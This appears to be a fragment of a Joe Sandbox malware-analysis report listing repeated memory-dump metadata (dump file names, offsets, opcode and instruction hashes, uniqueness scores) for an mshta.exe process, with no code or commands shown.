                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1018317467.0000000008C20000.00000010.00000800.00020000.00000000.sdmp, Offset: 08C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_8c20000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction ID: 6e42126e5459d552d960692e5e29fa91307a3d90e7c3c01a4db5f4c01e5163ba
                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1018317467.0000000008C20000.00000010.00000800.00020000.00000000.sdmp, Offset: 08C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_8c20000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction ID: 6e42126e5459d552d960692e5e29fa91307a3d90e7c3c01a4db5f4c01e5163ba
                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1018317467.0000000008C20000.00000010.00000800.00020000.00000000.sdmp, Offset: 08C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_8c20000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction ID: 6e42126e5459d552d960692e5e29fa91307a3d90e7c3c01a4db5f4c01e5163ba
                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.993753633.0000000006AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_6ac0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction ID: 46f28042cf4e08ea6ac18cda5f52a49c994f3ccd739f56833959c5c4dd07628f
                                          • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.993753633.0000000006AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_6ac0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction ID: 46f28042cf4e08ea6ac18cda5f52a49c994f3ccd739f56833959c5c4dd07628f
                                          • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.993753633.0000000006AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_6ac0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction ID: 46f28042cf4e08ea6ac18cda5f52a49c994f3ccd739f56833959c5c4dd07628f
                                          • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1058948926.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_3180000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                          • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1058948926.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_3180000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                          • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1058948926.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_3180000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                          • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: X
                                          • API String ID: 0-203178133
                                          • Opcode ID: fae4dbbdf6299c3646f73ed60b6c1784193597c0277b9a679130fe992fb922a4
                                          • Instruction ID: cb1b72fea482bf3c3a122bc4e0b5efd98b1c3daafc7e2f262ddbf129d6cf5a96
                                          • Opcode Fuzzy Hash: fae4dbbdf6299c3646f73ed60b6c1784193597c0277b9a679130fe992fb922a4
                                          • Instruction Fuzzy Hash: B5E1142472CE4D4FDB49E76C8458A34B7D2FB9D342B5845EBE44EC72A2DA20DC91C381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1186810782.000000000A180000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A180000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_a180000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: X
                                          • API String ID: 0-203178133
                                          • Opcode ID: 1a35ea52ffec6e1580750fd99c62331a86f80a32f076bfb6f9a5ccdb5ad24086
                                          • Instruction ID: 27c29a6021f77a60b6c83db57e88273c2797f8eb414d0e17fdaee74c6d8b2c0e
                                          • Opcode Fuzzy Hash: 1a35ea52ffec6e1580750fd99c62331a86f80a32f076bfb6f9a5ccdb5ad24086
                                          • Instruction Fuzzy Hash: E8D12870628F1D8FCB59EB2C8448A24B7E2FF99740B6441DAD459D7296DB30EC92CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%